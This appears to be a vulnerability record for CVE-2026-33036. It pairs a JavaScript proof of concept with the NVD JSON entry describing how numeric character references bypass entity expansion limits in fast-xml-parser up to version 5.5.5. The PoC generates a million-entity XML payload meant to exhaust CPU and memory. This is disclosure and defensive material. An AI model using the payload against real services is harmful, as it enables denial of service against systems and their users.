CVE-2026-33036

const { XMLParser } = require("fast-xml-parser"); /** * PoC for CVE-2026-33036 * Demonstrates bypassing entity expansion limits using numeric character references. */ function generatePayload(count) { let payload = "<root>"; // Generating numeric character references which bypass maxTotalExpansions for (let i = 0; i < count; i++) { payload += "&#65;"; // 'A' } payload += "</root>"; return payload; } const parser = new XMLParser({ ignoreAttributes: true, // Strict limits intended to prevent DoS (Billion Laughs) maxTotalExpansions: 1000, maxExpandedLength: 1000 }); // Generate 1 million numeric entities const maliciousXml = generatePayload(1000000); console.time("Attack"); try { // Despite limits, this will cause high CPU/Memory usage const result = parser.parse(maliciousXml); console.log("Parsing finished. Result length:", result.root.length); } catch (e) { console.error("Error:", e.message); } console.timeEnd("Attack");

{"cve": {"id": "CVE-2026-33036", "sourceIdentifier": "[email protected]", "published": "2026-03-20T06:16:11.630", "lastModified": "2026-03-23T16:28:10.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (&#NNN;, &#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like &#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process—even when developers have configured strict limits. This issue has been fixed in version 5.5.6."}, {"lang": "es", "value": "fast-xml-parser permite a los usuarios procesar XML desde objetos JS sin bibliotecas basadas en C/C++ ni callbacks. Las versiones 4.0.0-beta.3 hasta la 5.5.5 contienen una vulnerabilidad de bypass donde las referencias de caracteres numéricos (&amp;#NNN;, &amp;#xHH;) y las entidades XML estándar evaden completamente los límites de expansión de entidades (p. ej., maxTotalExpansions, maxExpandedLength) añadidos para corregir CVE-2026-26278, lo que permite la denegación de servicio por expansión de entidades XML. La causa raíz es que replaceEntitiesValue() en OrderedObjParser.js solo aplica el conteo de expansión en entidades definidas en DOCTYPE, mientras que el bucle lastEntities que maneja las entidades numéricas/estándar no realiza ningún conteo. Un atacante que suministre 1M de referencias de entidades numéricas como A puede forzar una asignación de memoria de ~147MB y un uso intensivo de CPU, lo que podría bloquear el proceso, incluso cuando los desarrolladores han configurado límites estrictos. Este problema ha sido corregido en la versión 5.5.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-776"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.1", "versionEndExcluding": "5.5.6", "matchCriteriaId": "AB9177BC-BACD-4367-9063-398ACE2AB4A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "2398B145-2ED8-4197-8838-FAE7AD7666E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "44B6C4BE-69F4-4651-80EE-055D1F99F7EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "4B32E8C4-15A7-466D-98A7-9EDD6B45F883"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "23CDA792-75FA-48A7-8577-4266A0BFB3A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "D4B7FD7D-0059-4D5B-898D-539AB43AA24A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "42844DDE-AD5B-4684-8104-1C2D133C6098"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta8:*:*:*:*:*:*", "matchCriteriaId": "C045B7F2-16A9-47C9-B08D-71847A940B93"}]}]}], "references": [{"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}